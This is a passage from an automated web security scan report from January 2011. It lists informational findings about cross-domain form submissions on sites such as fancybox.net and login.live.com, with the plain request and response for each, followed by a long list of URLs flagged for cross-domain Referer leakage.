Host: astrocenter.astrology.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 92589
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:45:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fre
...[SNIP]...
</tr>
<form id="frmNewsletterDaily" name="frmNewsletterDaily" action="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdEm&Af=-1000" method="post">
<input type="hidden" name="De" value="StEdEm">
...[SNIP]...

21.2. http://curmudgeons.blogspot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://curmudgeons.blogspot.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
submit
encrypted

Request

GET / HTTP/1.1
Host: curmudgeons.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.3. http://fancybox.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fancybox.net
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
amount
no_shipping
no_note
currency_code
tax
lc
bn

Request

GET / HTTP/1.1
Host: fancybox.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:41:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 9835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equ
...[SNIP]...
</p>

                   <form id="donate_form" action="https://www.paypal.com/cgi-bin/webscr" method="post">
                       <p>
...[SNIP]...

21.4. https://login.live.com/resetpw.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/resetpw.srf

Issue detail

The page contains a form which POSTs data to the domain accountservices.passport.net. The form contains the following fields:

mspppostint

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:17 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H48 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:17 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4b999dd4-4e4f-4340-b8dc-e3af3429245c; path=/;version=1
Set-Cookie: MSPBack=0; domain=login.live.com;path=/;version=1
Content-Length: 1188

<html><head><noscript>JavaScript required to sign in<meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033"/></noscript><title>Continue</title><script type=
...[SNIP]...
<body onload="javascript:DoSubmit();"><form name="fmHF" id="fmHF" action="https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033" method="post" target="_top"><input type="hidden" name="mspppostint" id="mspppostint" value="CSAzsPt0tCN9aolbnioNXK9xLDW/VjpbqMOgDaanWU9LFefV8abjZ++Rwb2pl+nX4QVwTFhDZ6jsGsg6TXz7THELk+7PqRYyMvrcERzW+34vSRrwv8hqkk4cx8WMAfvZw8mwsc2T5
...[SNIP]...

21.5. http://news.discovery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.discovery.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain ebm.cheetahmail.com. The form contains the following fields:

a
n
aid
id
RCODE
sub
email
signup

Request

GET / HTTP/1.1
Host: news.discovery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix)
Content-Length: 62539
Content-Type: text/html; charset=UTF-8
X-ServerId: 192.168.32.151
Content-Language: en-US
Cache-Control: max-age=292
Date: Sun, 30 Jan 2011 02:17:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html
xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en"
>

<head>
<meta http-equiv
...[SNIP]...
<br />
<form id="newsletter-form" method="post" action="http://ebm.cheetahmail.com/r/regf2" target="_blank" onsubmit="return formClickEvent.track(this, {rule:'newsletter',name:'discovery news',action:true});">
<input value="2" type="hidden" name="a" />
...[SNIP]...

21.6. http://planetary.org/blog previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://planetary.org
Path:	/blog

Issue detail

The page contains a form which POSTs data to the domain idx355.idx.net. The form contains the following fields:

email
subscribe
name
list
confirm
showconfirm
url
appendsubinfotourl

Request

GET /blog HTTP/1.1
Host: planetary.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:46 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 46216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</p>

<form action="http://idx355.idx.net/subscribe/subscribe.tml" method="POST">
<table class="info outline" cellspacing="0" cellpadding="3">
...[SNIP]...

21.7. http://www.dailygrail.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailygrail.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
no_shipping
no_note
currency_code
tax
lc
bn
submit

Request

GET / HTTP/1.1
Host: www.dailygrail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com
Last-Modified: Sun, 30 Jan 2011 02:11:26 GMT
ETag: "bf0c65ff60c7c1de71eb6cacfe0d3728"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:32 GMT
Server: lighttpd
Content-Length: 63252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr">
<head>
<meta http-eq
...[SNIP]...
<br />
<form action="https://www.paypal.com/cgi-bin/webscr" method="post"><input type="hidden" name="cmd" value="_donations" />
...[SNIP]...

21.8. http://www.hobbyspace.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hobbyspace.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
return
item_name
no_shipping
cancel_return
submit2

Request

GET / HTTP/1.1
Host: www.hobbyspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.9. http://www.slate.com/id/2282444/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.slate.com
Path:	/id/2282444/

Issue detail

The page contains a form which POSTs data to the domain slate.us2.list-manage.com. The form contains the following fields:

EMAIL
SIGNUPSRC
subscribe

Request

GET /id/2282444/ HTTP/1.1
Host: www.slate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.10. http://www.transterrestrial.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.transterrestrial.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
encrypted
submit

Request

GET / HTTP/1.1
Host: www.transterrestrial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.transterrestrial.com/wordpress/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 75605



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
< End Amazon Honor System Paybox -->
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

22. Cross-domain Referer leakage previous next
There are 489 instances of this issue:

http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6
http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6
http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3
http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3
http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5
http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5
http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8
http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8
http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159
http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159
http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159
http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6
http://ad.doubleclick.net/adi/N4319.msn/B2087123.383
http://ad.doubleclick.net/adi/N4319.msn/B2087123.383
http://ad.doubleclick.net/adi/N4441.microsoftonline/B5073082
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4
http://ad.doubleclick.net/adi/tigerdirect.com/Section_2_House
http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.27
http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.8
http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31
http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**
http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**
http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**
http://ad.yieldmanager.com/pixel
http://add.my.yahoo.com/rss
http://ads.asp.net/a.aspx
http://ads.neudesicmediagroup.com/a.aspx
http://analytics.live.com/Sync.html
http://assets.tumblr.com/iframe.html
http://astrocenter.astrology.redacted/msn/Default.aspx
http://astrocenter.astrology.redacted/msn/Default.aspx
http://b.rad.redacted/ADSAdClient31.dll
http://b.rad.redacted/ADSAdClient31.dll
http://b.rad.redacted/ADSAdClient31.dll
http://b.rad.redacted/ADSAdClient31.dll
http://b.rad.redacted/ADSAdClient31.dll
http://b.rad.redacted/ADSAdClient31.dll
http://b.rad.redacted/ADSAdClient31.dll
http://b.rad.redacted/ADSAdClient31.dll
http://b.rad.redacted/ADSAdClient31.dll
http://b.rad.redacted/ADSAdClient31.dll
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90
http://ccc01.opinionlab.com/o.asp
http://cdn.lib.newsvine.com/_static/js/d57b389e60d7c68b274fdadecdd0b4f51248430e.js
http://cm.g.doubleclick.net/pixel
http://cms.ad.yieldmanager.net/v1/cms
http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/
http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/
http://dating.redacted/cp.aspx
http://dating.redacted/cp.aspx
http://dating.redacted/en-us/partner/msn/38028.html
http://dating.redacted/en-us/partner/msn/38028.html
http://dating.redacted/index.aspx
http://dating.redacted/index.aspx
http://dating.redacted/search/index.aspx
http://dating.redacted/search/index.aspx
http://dating.redacted/search/index.aspx
http://dating.redacted/search/index.aspx
http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23
http://editorial.autos.redacted/article.aspx
http://editorial.autos.redacted/article.aspx
http://editorial.autos.redacted/slideshow.aspx
http://editorial.autos.redacted/slideshow.aspx
http://english.aljazeera.net/_inc/adsrc.html
http://entertainment.redacted/news/
http://entertainment.redacted/news/
http://entertainment.redacted/video/
http://entertainment.redacted/video/
http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss
http://forums.silverlight.net/adchain.html
http://forums.silverlight.net/adchain.html
http://forums.silverlight.net/adchain.html
http://forums.silverlight.net/adchain.html
http://forums.silverlight.net/adchain.html
http://forums.silverlight.net/adchain.html
http://forums.silverlight.net/adchain.html
http://forums.silverlight.net/forums/TopicsNotAnswered.aspx
http://forums.silverlight.net/forums/topicsactive.aspx
http://go.microsoft.com/
http://go.microsoft.com/fwlink/
http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy
http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy
http://investing.money.redacted/investments/charts
http://investing.money.redacted/investments/currency-exchange-rates/
http://investing.money.redacted/investments/market-index/
http://investing.money.redacted/investments/stock-price
http://investing.money.redacted/investments/stock-price/
http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never
http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never
http://lifestyle.redacted/relationships/staticslideshowglamour.aspx
http://lifestyle.redacted/relationships/staticslideshowglamour.aspx
http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx
http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx
http://lifestyle.redacted/your-life/family-parenting/article.aspx
http://lifestyle.redacted/your-life/family-parenting/article.aspx
http://lifestyle.redacted/your-life/new-year-new-you/video.aspx
http://lifestyle.redacted/your-life/new-year-new-you/video.aspx
http://lifestyle.redacted/your-life/your-money-today/article.aspx
http://lifestyle.redacted/your-life/your-money-today/article.aspx
http://lifestyle.redacted/your-life/your-money-today/video.aspx
http://lifestyle.redacted/your-life/your-money-today/video.aspx
http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx
http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx
http://lifestyle.redacted/your-look/video/
http://lifestyle.redacted/your-look/video/
http://local.redacted/events.aspx
http://local.redacted/hourly.aspx
http://local.redacted/hourly.aspx
http://local.redacted/movies-events.aspx
http://local.redacted/movies-events.aspx
http://local.redacted/news.aspx
http://local.redacted/news.aspx
http://local.redacted/sports.aspx
http://local.redacted/sports.aspx
http://local.redacted/ten-day.aspx
http://local.redacted/ten-day.aspx
http://local.redacted/weather.aspx
http://local.redacted/weather.aspx
http://login.live.com/login.srf
https://login.live.com/login.srf
https://login.live.com/ppsecure/post.srf
https://login.live.com/ppsecure/secure.srf
https://login.silverlight.net/login/createuser.aspx
https://login.silverlight.net/login/createuser.aspx
https://login.silverlight.net/login/createuser.aspx
https://login.silverlight.net/login/createuser.aspx
https://login.silverlight.net/login/createuser.aspx
https://login.silverlight.net/login/createuser.aspx
https://login.silverlight.net/login/createuser.aspx
https://login.silverlight.net/login/createuser.aspx
https://login.silverlight.net/login/createuser.aspx
https://login.silverlight.net/login/createuser.aspx
https://login.silverlight.net/login/createuser.aspx
https://login.silverlight.net/login/createuser.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
https://login.silverlight.net/login/signin.aspx
http://money.redacted//
http://money.redacted//
http://money.redacted//
http://money.redacted/auto-insurance/article.aspx
http://money.redacted/auto-insurance/article.aspx
http://money.redacted/auto-insurance/article.aspx
http://money.redacted/auto-insurance/article.aspx
http://money.redacted/business-news/article.aspx
http://money.redacted/business-news/article.aspx
http://money.redacted/business-news/news.aspx
http://money.redacted/business-news/news.aspx
http://money.redacted/business-news/news.aspx
http://money.redacted/business-news/news.aspx
http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx
http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx
http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx
http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx
http://money.redacted/how-to-invest/default-dyn.aspx
http://money.redacted/how-to-invest/default-dyn.aspx
http://money.redacted/how-to-invest/video.aspx
http://money.redacted/how-to-invest/video.aspx
http://money.redacted/identity-theft/default-dyn.aspx
http://money.redacted/identity-theft/default-dyn.aspx
http://money.redacted/identity-theft/default-dyn.aspx
http://money.redacted/identity-theft/default-dyn.aspx
http://money.redacted/investing
http://money.redacted/investing
http://money.redacted/investing
http://money.redacted/investing
http://money.redacted/market-news/post.aspx
http://money.redacted/market-news/post.aspx
http://money.redacted/market-news/post.aspx
http://money.redacted/market-news/post.aspx
http://money.redacted/mutual-fund/default-dyn.aspx
http://money.redacted/mutual-fund/default-dyn.aspx
http://money.redacted/mutual-fund/default-dyn.aspx
http://money.redacted/mutual-fund/default-dyn.aspx
http://money.redacted/saving-money/50-30-20-budget.aspx
http://money.redacted/saving-money/50-30-20-budget.aspx
http://money.redacted/saving-money/50-30-20-budget.aspx
http://money.redacted/saving-money/50-30-20-budget.aspx
http://money.redacted/top-stocks/post.aspx
http://money.redacted/top-stocks/post.aspx
http://redacted/investor/StockRating/srstopstocksresults.aspx
http://redacted/investor/StockRating/srstopstocksresults.aspx
http://redacted/investor/charts/chartdl.aspx
http://redacted/investor/charts/chartdl.aspx
http://redacted/investor/charts/chartdl.aspx
http://redacted/investor/charts/chartdl.aspx
http://redacted/investor/charts/chartdl.aspx
http://redacted/investor/charts/chartdl.aspx
http://redacted/investor/charts/chartdl.aspx
http://redacted/investor/charts/chartdl.aspx
http://redacted/investor/charts/chartdl.aspx
http://redacted/investor/partsub/funds/etfperformancetracker.aspx
http://redacted/investor/partsub/funds/etfperformancetracker.aspx
http://redacted/investor/partsub/funds/etfperformancetracker.aspx
http://redacted/investor/partsub/funds/etfperformancetracker.aspx
http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/
http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/
http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/
http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/
http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/
http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.careerbuilder.com/msn/default.aspx
http://msn.chemistry.com/cp/landing/44762
http://msn.chemistry.com/cp/landing/57269
http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/
http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/
http://msn.foxsports.com/video
http://my.live.com/
http://my.redacted/addtomymsn.armx
http://my.redacted/addtomymsn.armx
http://oasc03049.popsci.com/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05
http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41
http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun
http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun
http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun
http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun
http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64
http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://rad.redacted/ADSAdClient31.dll
http://realestate.redacted/OmRedir.aspx
http://realestate.redacted/article.aspx
http://realestate.redacted/article.aspx
http://realestate.redacted/slideshow.aspx
http://realestate.redacted/slideshow.aspx
http://recruiting.scout.com/a.z
http://rss.scout.com/rss.aspx
http://search.twitter.com/search
http://search.twitter.com/search
https://secure.opinionlab.com/ccc01/o.asp
https://secure.scout.com/a.z
http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx
http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx
http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx
http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx
http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx
http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx
http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx
http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx
http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx
http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx
http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx
http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx
http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx
http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx
http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx
http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx
http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx
http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx
http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx
http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx
http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx
http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx
http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx
http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx
http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx
http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx
http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx
http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx
http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx
http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx
http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx
http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx
http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx
http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx
http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx
http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx
http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx
http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx
http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx
http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx
http://specials.redacted/IEIncreaseFont_preview.aspx
http://specials.redacted/IEIncreaseFont_preview.aspx
http://sstatic.net/Js/wmd.js
http://stackoverflow.com/users/login
http://syndication.jobthread.com/jt/syndication/page.php
http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/
http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/
http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/
http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/
http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/
http://technolog.msnbc.redacted/_nv/more/section/archive
http://technolog.msnbc.redacted/_nv/more/section/archive
http://theinvestedlife.redacted/
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt
http://tv.redacted/tv/article.aspx
http://tv.redacted/tv/article.aspx
http://redcated/CNT/iview/286609711/direct
http://redcated/CNT/iview/286609711/direct
http://redcated/CNT/iview/286609711/direct
http://redcated/CNT/iview/286609711/direct
http://redcated/CNT/iview/286609711/direct
http://redcated/CNT/iview/287065754/direct
http://redcated/DEN/jview/286026710/direct
http://redcated/NYC/iview/264935949/direct
http://wonderwall.redacted/movies/celeb-inc-for-jan-28-11106.gallery
http://wonderwall.redacted/movies/celeb-inc-for-jan-28-11106.gallery
http://wonderwall.redacted/music/chris-brown-completes-domestic-violence-program-1594072.story
http://wonderwall.redacted/music/chris-brown-completes-domestic-violence-program-1594072.story
